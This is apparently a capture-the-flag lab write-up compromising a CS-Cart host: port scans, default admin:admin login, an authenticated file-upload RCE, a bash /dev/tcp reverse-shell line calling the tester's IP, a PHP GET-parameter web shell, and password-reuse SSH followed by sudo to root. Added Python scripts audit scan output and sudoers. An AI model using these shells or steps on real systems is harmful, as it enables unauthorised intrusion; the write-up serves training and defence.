TCP Ports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 08:40 +08
Nmap scan report for 192.168.113.39
Host is up (0.039s latency).
Not shown: 65527 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s

Nmap done: 1 IP address (1 host up) scanned in 6.89 seconds

TCP Service Scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 08:41 +08
Nmap scan report for 192.168.113.39
Host is up (0.040s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 
|   1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_  2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp  open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: CS-Cart. Powerful PHP shopping cart software
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
110/tcp open  pop3        Dovecot pop3d
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
|_pop3-capabilities: UIDL PIPELINING STLS TOP SASL RESP-CODES CAPA
|_ssl-date: 2024-11-23T00:41:58+00:00; +6s from scanner time.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open  imap        Dovecot imapd
|_ssl-date: 2024-11-23T00:41:59+00:00; +7s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
|_imap-capabilities: SORT OK THREAD=REFERENCES CHILDREN completed SASL-IR IMAP4rev1 UNSELECT STARTTLS LOGINDISABLEDA0001 NAMESPACE LOGIN-REFERRALS IDLE MULTIAPPEND Capability LITERAL+
445/tcp open  netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open  ssl/imaps?
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
|_ssl-date: 2024-11-23T00:41:58+00:00; +7s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
995/tcp open  ssl/pop3s?
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
|_ssl-date: 2024-11-23T00:41:59+00:00; +7s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.26a)
|   Computer name: payday
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: payday
|_  System time: 2024-11-22T19:41:50-05:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 50m07s, deviation: 2h02m30s, median: 6s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.15 seconds
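The service scan above contains several findings that a defender would want pulled out automatically rather than read by eye: SSLv2 with export-grade ciphers on the mail ports, a server certificate that expired in 2008, SMB message signing disabled, and 2007-era builds of OpenSSH, Apache, PHP and Samba. The Python script below is an added example and is not part of the original writeup or of Nmap; it parses a constructed excerpt modelled on the scan output above and turns it into prioritised findings. The end-of-life prefix table, the weak-cipher markers and the severity labels are assumptions chosen for the example.

```python
import re
from datetime import datetime

# Constructed excerpt modelled on the Nmap -sV output shown on this page.
SAMPLE_SCAN = """\
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
110/tcp open  pop3        Dovecot pop3d
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
|_pop3-capabilities: UIDL PIPELINING STLS TOP SASL RESP-CODES CAPA
445/tcp open  netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open  ssl/imaps?
| sslv2:
|   SSLv2 supported
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA
| Not valid before: 2008-04-25T02:02:48
|_Not valid after:  2008-05-25T02:02:48
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
"""
SCAN_DATE = datetime(2024, 11, 23)  # date the sample scan was taken

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|_?\s*(.*)$")  # NSE script output lines start with | or |_

# Assumption: a small hard-coded table of version prefixes that are long out of
# support; a real tool would consult a maintained vulnerability database.
EOL_PREFIXES = ("OpenSSH 4.", "Apache httpd 2.2.", "PHP/5.", "Samba smbd 3.0.")
WEAK_CIPHER_MARKERS = ("EXPORT", "RC4", "DES_", "_MD5")


def parse_nmap(text):
    """Return {"<port>/<proto>" | "host": {state, service, version, scripts}}."""
    records = {}
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("Host script results"):
            current = records.setdefault(
                "host", {"state": "", "service": "", "version": "", "scripts": []})
            continue
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            current = {"state": state, "service": service,
                       "version": version, "scripts": []}
            records[f"{port}/{proto}"] = current
            continue
        m = SCRIPT_RE.match(line)
        if m and current is not None:
            current["scripts"].append(m.group(1).strip())
    return records


def assess(records, scan_date):
    """Return [(severity, port_label, message)] for the parsed scan."""
    findings = []
    for label, rec in records.items():
        scripts = rec["scripts"]
        if any(p in rec["version"] for p in EOL_PREFIXES):
            findings.append(("high", label, f"end-of-life software: {rec['version']}"))
        if "SSLv2 supported" in scripts:
            findings.append(("high", label, "SSLv2 offered"))
        weak = [s for s in scripts
                if s.startswith(("SSL2_", "TLS_"))
                and any(k in s for k in WEAK_CIPHER_MARKERS)]
        if weak:
            findings.append(("medium", label, "weak cipher suites: " + ", ".join(weak)))
        for s in scripts:
            if s.startswith("Not valid after:"):
                expiry = datetime.fromisoformat(s.split(":", 1)[1].strip())
                if expiry < scan_date:
                    findings.append(("high", label, f"certificate expired on {expiry.date()}"))
            if s.startswith("message_signing:") and "disabled" in s:
                findings.append(("medium", label, "SMB message signing disabled"))
    return findings


def assess_sample():
    """Run the assessment over the constructed excerpt."""
    return assess(parse_nmap(SAMPLE_SCAN), SCAN_DATE)


if __name__ == "__main__":
    for severity, label, message in assess_sample():
        print(f"[{severity:<6}] {label:<8} {message}")
```

Feed it the normal-format output of a service scan; ports without any script output still get the version check, and host-level script results are reported under the label "host".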

Port 80

Port 80 is running e-commerce software, CS-Cart: http://192.168.113.39/index.php

Register Account

Error And Success

I received some errors upon registration, but the account was created.

Admin Panel

I was reading the documentation and found the default Admin Panel URL.

http://192.168.113.39/admin.php

Fortunately, the Admin Panel URL was not changed.

My first guess at credentials turned out to be correct: admin:admin

Version

I found the version of the software in one of the links.

Exploit

I found an authenticated RCE exploit for CS-Cart meant for version 1.3.3: https://www.exploit-db.com/exploits/48891

I couldn’t find the file manager mentioned in the exploit. Some searching on Google gave me a GitHub page that explains it: https://gist.github.com/momenbasel/ccb91523f86714edb96c871d4cf1d05c

I then followed the instructions and uploaded shell.phtml.

Error

After uploading shell.phtml, I navigated to it but it looks like there’s an issue with my reverse shell. I also tried other ports to no avail.

Troubleshoot

I tested to see if basic PHP execution works, and the whoami command works.

<?php system('whoami');?>

Reverse Shell

I then tried executing a command to get a reverse shell but it didn’t work.

<?php system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.45.164/8888 0>&1"');?>

Enumeration via PHP Execution

I found user patrick.

I can probably cat the local.txt but I want a way in.

I couldn’t find a .ssh directory in user patrick so I tried searching the whole system.

<?php system('find / -type d -iname ".ssh" 2>/dev/null');?>

Unfortunately, only root has SSH and I probably won’t have access to /root.

/root

But oh wait, I do have read access to root as well as .ssh.

authorized_keys

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzx6C2kxbb2qPx9eRyW072CYpMhpa2zAlzgdBcElRS49cvTJlDcjqvC8DlpZL9FplzcfpCmD2xisb0VdHUtG2iteYQG5WaxUEeHd4t9XRqA9zCU3QjKq4jIDoT1A54HYLoEBk/jTxjUbaczfoFSgcZEOivBIZEM6usJW4gDgbpok1UoxHfmn7rRs43rgBKxKMpFZyp0+MsDlvKMZUie6F0mY60E2YSlwoyLAJKi0q1/oWB5Kmd3YtP20LIsVqvmbX7zcMXwXgztff0Wxj1dps0x6i1StYx1l14sU84comlceyZjzeYpqMoL+4OtWt4goqTqpiQasnXfv2vhNvCQXQaQ== root@explorer

Unfortunately, it only has an authorized_keys file and no private key for me to use. Seems like a dead end and I’m falling into a rabbit hole.

LFI exploit

Looking at the CS-Cart exploit Google search results again, I found another exploit for the same version: https://www.exploit-db.com/exploits/48890

But this is as good as me performing the RCE exploit, if not worse.

Revisit RCE

I revisited the earlier RCE exploit and tried uploading a PHP web shell, which gives me better output.

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

However, this is really just a more user-friendly way of seeing the outputs of commands executed and the way in was still nowhere to be seen.

SSH

Nothing works but SSH with patrick:patrick works so everything else seems like a rabbit hole right now.

sudo -l shows that patrick can run ANY command as ANY user. A trivial sudo su did the trick.

sshpass -p 'patrick' ssh patrick@192.168.113.39

Linux payday 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
patrick@payday:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for patrick:
User patrick may run the following commands on this host:
    (ALL) ALL
patrick@payday:~$ sudo su
root@payday:/home/patrick# id
uid=0(root) gid=0(root) groups=0(root)
root@payday:/home/patrick# cat local.txt
f4931662e8e0f3d1878d838311218b2f
root@payday:/home/patrick# cat /root/proof.txt
2f434ac0f7a810be6d8dac5a5042cc51
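The sudo -l result above, (ALL) ALL granted to an account with a trivial password, is the kind of entry a sudoers review should surface before anyone else finds it. As an added example (not part of the original writeup), the Python script below parses sudoers-format rules from a constructed sample and reports unrestricted or password-less entries. The sample rules, the tag handling and the severity labels are assumptions for the example; #include directives and User_Alias/Cmnd_Alias expansion are not handled.

```python
import re

# Constructed sudoers content, modelled on the (ALL) ALL entry this page found
# for patrick, plus tighter entries for comparison.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root    ALL=(ALL) ALL
patrick ALL=(ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
deploy  ALL=(www-data) /usr/bin/systemctl restart apache2
%admin  ALL=(ALL) ALL
"""

# who  hosts = (runas) [TAG:] command[, command...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<spec>.+)$")
TAGS = ("NOPASSWD:", "PASSWD:", "NOEXEC:", "SETENV:", "NOSETENV:",
        "LOG_INPUT:", "LOG_OUTPUT:")


def parse_sudoers(text):
    """Return a list of rule dicts: who, hosts, runas, tags, commands."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        spec, tags = m.group("spec").strip(), []
        stripped = True
        while stripped:                        # peel leading tags, e.g. NOPASSWD:
            stripped = False
            for tag in TAGS:
                if spec.startswith(tag):
                    tags.append(tag.rstrip(":"))
                    spec = spec[len(tag):].strip()
                    stripped = True
        rules.append({
            "who": m.group("who"),
            "hosts": m.group("hosts"),
            "runas": (m.group("runas") or "root").strip(),
            "tags": tags,
            "commands": [c.strip() for c in spec.split(",")],
        })
    return rules


def audit_sudoers(text):
    """Return [(severity, who, message)] for risky non-root entries."""
    findings = []
    for r in parse_sudoers(text):
        if r["who"] == "root":
            continue
        if "ALL" in r["commands"]:
            severity = "critical" if "NOPASSWD" in r["tags"] else "high"
            findings.append((severity, r["who"], "unrestricted command set (ALL)"))
        elif "NOPASSWD" in r["tags"]:
            findings.append(("medium", r["who"],
                             "password-less sudo for " + ", ".join(r["commands"])))
    return findings


if __name__ == "__main__":
    for severity, who, message in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{severity}] {who}: {message}")
```

Run it over /etc/sudoers and the files under /etc/sudoers.d; an entry that passes the audit still needs a look at whether the listed commands can spawn a shell, which this example does not check.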